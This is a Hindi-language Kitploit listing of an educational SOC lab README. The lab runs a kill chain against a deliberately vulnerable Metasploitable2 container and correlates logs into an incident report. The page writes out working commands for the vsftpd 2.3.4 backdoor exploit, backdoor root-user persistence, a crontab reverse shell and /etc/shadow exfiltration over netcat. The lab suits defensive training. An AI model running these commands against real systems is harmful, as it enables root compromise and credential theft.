Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

फ़ीडसंपर्कगोपनीयता© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
soc-investigation-lab — अंत-से-अंत SOC जांच: CVE-2011-2523 किल चेन, बहु-स्रोत लॉग सहसंबंध, घटना रिपोर्ट — MITRE ATT&CK T1190 | Kitploit
उपकरण/GitHubGitHub/mithileshan/soc-investigation-lab
टोहीभेद्यता विश्लेषणशोषणफोरेंसिकपोस्ट-शोषणपेनिट्रेशन टेस्टिंगखतरा खुफियालर्निंग और शिक्षाघटना प्रतिक्रिया

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
लॉग विश्लेषण
लैब और अभ्यास
GitHubmithileshan/soc-investigation-lab

soc-investigation-lab

अंत-से-अंत SOC जांच: CVE-2011-2523 किल चेन, बहु-स्रोत लॉग सहसंबंध, घटना रिपोर्ट — MITRE ATT&CK T1190

रिपॉजिटरी देखें
155 महीने पहलेअभी तक समीक्षित नहीं

एंड-टू-एंड SOC जांच प्रयोगशाला

Metasploitable2 के विरुद्ध एक पूर्ण चार-चरण आक्रमण श्रृंखला (टोही → शोषण → स्थिरता → डेटा चोरी) को निष्पादित करता है, प्रत्येक चरण में साक्ष्य एकत्र करता है, और एक संरचित घटना समयरेखा और SOC रिपोर्ट तैयार करता है — एक साथ हमलावर और रक्षक सोच का प्रदर्शन करता है।

MITRE ATT&CK T1190 MITRE ATT&CK T1136 MITRE ATT&CK T1078 MITRE ATT&CK T1041 Python


उद्देश्य

यह कैपस्टोन परियोजना है। यह निम्नलिखित क्षमताओं को प्रदर्शित करता है:

  • एक जानबूझकर कमजोर लक्ष्य के विरुद्ध एक यथार्थवादी किल चेन को निष्पादित करना
  • कई टेलीमेट्री स्रोतों का उपयोग करके प्रत्येक चरण में फोरेंसिक साक्ष्य एकत्र करना
  • विभिन्न प्रणालियों से लॉग प्रविष्टियों को एक एकीकृत घटना समयरेखा में सहसंबंधित करना
  • दृश्यता अंतर विश्लेषण करना — यह पहचानना कि उचित पहचान कवरेज के बिना क्या छूट गया होता
  • वास्तविक सुरक्षा टीमों द्वारा उपयोग किए जाने वाले प्रारूप में SOC-ग्रेड घटना रिपोर्ट तैयार करना

उपयोग किया गया शोषण (CVE-2011-2523 — vsftpd 2.3.4 बैकडोर) ऐतिहासिक रूप से महत्वपूर्ण है: यह एक आपूर्ति श्रृंखला हमला था जहां एक विरोधी ने ओपन-सोर्स vsftpd पैकेज स्रोत रिपॉजिटरी में एक बैकडोर इंजेक्ट किया था।


आर्किटेक्चर

                    ╔═══════════════════════════════╗
                    ║  soc-lab (172.23.0.0/24)       ║
                    ║                               ║
┌─────────────┐     ║  ┌─────────────────────────┐  ║
│  हमलावर     │     ║  │  Metasploitable2        │  ║
│  Kali Linux │     ║  │  172.23.0.200           │  ║
│             │     ║  │                         │  ║
│  चरण 1      │─────╫─►│  :21  vsftpd 2.3.4 ◄───╫──╫── CVE-2011-2523
│  nmap -A    │     ║  │  :22  SSH               │  ║    :6200 पर बैकडोर
│             │     ║  │  :80  HTTP (DVWA)        │  ║
│  चरण 2      │─────╫─►│  :445 Samba             │  ║
│  msf शोषण   │◄────╫──│  :6200 रूट शेल         │  ║
│             │     ║  └─────────────────────────┘  ║
│  चरण 3      │─────╫─► useradd sysbackup           ║
│  स्थिरता    │─────╫─► crontab रिवर्स शेल          ║
│             │     ║                               ║
│  चरण 4      │◄────╫── :5555 के माध्यम से /etc/shadow║
│  डेटा चोरी  │     ╚═══════════════════════════════╝
└──────┬──────┘
       │
       │ साक्ष्य संग्रह:
       │  logs/msf_session.log
       │  logs/target_auth.log
       │  captures/full_attack_chain.pcap (tshark CSV)
       ▼
┌──────────────────────────────────────────────────┐
│  build_timeline.py                               │
│  पार्सर: MSF लॉग + auth.log + tshark CSV         │
│  → टाइमस्टैम्प द्वारा विलय → चरण द्वारा टैग   │
│  → JSON समयरेखा + Markdown घटना रिपोर्ट         │
└──────────────────────────────────────────────────┘

उपकरण और स्टैक

उपकरणउद्देश्य
Metasploitable2जानबूझकर कमजोर Linux लक्ष्य
Nmap 7.94चरण 1: सेवा गणना
Metasploit 6.xचरण 2: vsftpd 2.3.4 शोषण
Netcatचरण 3–4: स्थिरता + डेटा चोरी
tsharkसभी चरणों में पैकेट कैप्चर
Python 3build_timeline.py — बहु-स्रोत लॉग विलयकर्ता
Splunk Free / ELKचरण-विशिष्ट SIEM पहचान

सेटअप

cd docker/

# Metasploitable2 प्रारंभ करें (पृथक नेटवर्क)
docker compose up -d metasploitable

# सत्यापित करें कि लक्ष्य पहुंच योग्य है
nmap -p 21,22,80 172.23.0.200

# पृष्ठभूमि पैकेट कैप्चर प्रारंभ करें
sudo tcpdump -i eth0 host 172.23.0.200 \
    -w captures/full_attack_chain.pcap &

कैसे चलाएं (आक्रमण श्रृंखला)

चरण 1 — टोही

nmap -sV -O -A \
    -p 21,22,80,139,445,3306,5432 \
    --script=banner,ftp-anon,http-title \
    -oX logs/recon_scan.xml \
    172.23.0.200

मुख्य निष्कर्ष: 21/tcp open ftp vsftpd 2.3.4

चरण 2 — शोषण (CVE-2011-2523)

# विधि A: Metasploit
msfconsole -q -x "
  use exploit/unix/ftp/vsftpd_234_backdoor;
  set RHOSTS 172.23.0.200;
  set PAYLOAD cmd/unix/interact;
  run" | tee logs/msf_session.log

# विधि B: मैन्युअल (तंत्र प्रदर्शित करता है)
# चरण 1: उपयोगकर्ता नाम में ':)' भेजकर बैकडोर ट्रिगर करें
printf "USER evil:)\r\nPASS x\r\n" | nc 172.23.0.200 21
# चरण 2: स्पॉन किए गए रूट शेल से कनेक्ट करें
nc 172.23.0.200 6200
# → id: uid=0(root) gid=0(root)

यह क्यों काम करता है: जब vsftpd 2.3.4 को :) सबस्ट्रिंग वाला उपयोगकर्ता नाम प्राप्त होता है, तो डेमॉन TCP पोर्ट 6200 से बंधे `execl("/bin/sh",...) को निष्पादित करता है। कोई प्रमाणीकरण आवश्यक नहीं — सीधा रूट शेल।

चरण 3 — स्थिरता

# लक्ष्य पर रूट शेल में निष्पादित करें:
useradd -m -s /bin/bash sysbackup
echo "sysbackup:$(openssl passwd -1 secr3t)" >> /etc/passwd
echo "sysbackup ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers
(crontab -l 2>/dev/null; echo "* * * * * bash -i >& /dev/tcp/172.23.0.1/9999 0>&1") | crontab -

चरण 4 — डेटा चोरी

# रिसीवर (हमलावर)
nc -lvnp 5555 > samples/exfiltrated_shadow.txt

# प्रेषक (लक्ष्य पर)
cat /etc/shadow | nc 172.23.0.1 5555

घटना समयरेखा बनाएं

# पहले PCAP को CSV में बदलें
bash ../02-network-recon-detection/src/pcap_to_siem.sh captures/full_attack_chain.pcap

# सभी स्रोतों से समयरेखा बनाएं
python3 src/build_timeline.py \
    --msf-log  logs/msf_session.log \
    --auth-log logs/target_auth.log \
    --pcap-csv captures/full_attack_chain_packets.csv \
    --output-json samples/timeline.json \
    --output-md   docs/incident_report.md \
    --pretty

नमूना आउटपुट

build_timeline.py stderr

2026-04-24T16:05:20  [INFO    ]  MSF लॉग से 9 ईवेंट पार्स किए गए
2026-04-24T16:05:20  [INFO    ]  auth.log से 11 ईवेंट पार्स किए गए
2026-04-24T16:05:20  [INFO    ]  PCAP CSV से 4 प्रवाह-आरंभ ईवेंट पार्स किए गए
2026-04-24T16:05:20  [INFO    ]  कुल ईवेंट (क्रमबद्ध): 24
2026-04-24T16:05:20  [INFO    ]  अद्वितीय IOCs निकाले गए: 4
2026-04-24T16:05:20  [INFO    ]  चरण RECON   : 8 ईवेंट
2026-04-24T16:05:20  [INFO    ]  चरण EXPLOIT : 4 ईवेंट
2026-04-24T16:05:20  [INFO    ]  चरण PERSIST : 6 ईवेंट
2026-04-24T16:05:20  [INFO    ]  चरण EXFIL   : 2 ईवेंट

घटना समयरेखा ( samples/sample_timeline.json से अंश)

{
  "total_events": 24,
  "iocs": [
    { "indicator": "172.23.0.1", "phase": "RECON",   "occurrence": 8 },
    { "indicator": "172.23.0.1", "phase": "EXPLOIT",  "occurrence": 2 },
    { "indicator": "sysbackup",  "phase": "PERSIST", "occurrence": 1 }
  ],
  "timeline": [
    { "timestamp": "2026-04-24T14:10:05+00:00", "phase": "RECON",   "description": "nmap -sV -O -A", "source": "metasploit" },
    { "timestamp": "2026-04-24T14:22:41+00:00", "phase": "EXPLOIT", "description": "सत्र 1 खोला गया (172.23.0.1 → 172.23.0.200)", "source": "metasploit" },
    { "timestamp": "2026-04-24T14:28:07+00:00", "phase": "PERSIST", "description": "useradd: नया उपयोगकर्ता: name=sysbackup", "source": "auth_log" },
    { "timestamp": "2026-04-24T14:35:52+00:00", "phase": "EXFIL",   "description": "प्रवाह 172.23.0.200 → 172.23.0.1:5555", "source": "pcap" }
  ]
}

दृश्यता अंतर विश्लेषण

यह सबसे महत्वपूर्ण विश्लेषणात्मक आउटपुट है — उचित पहचान के बिना क्या छूट गया होता।

टूल डाउनलोड करें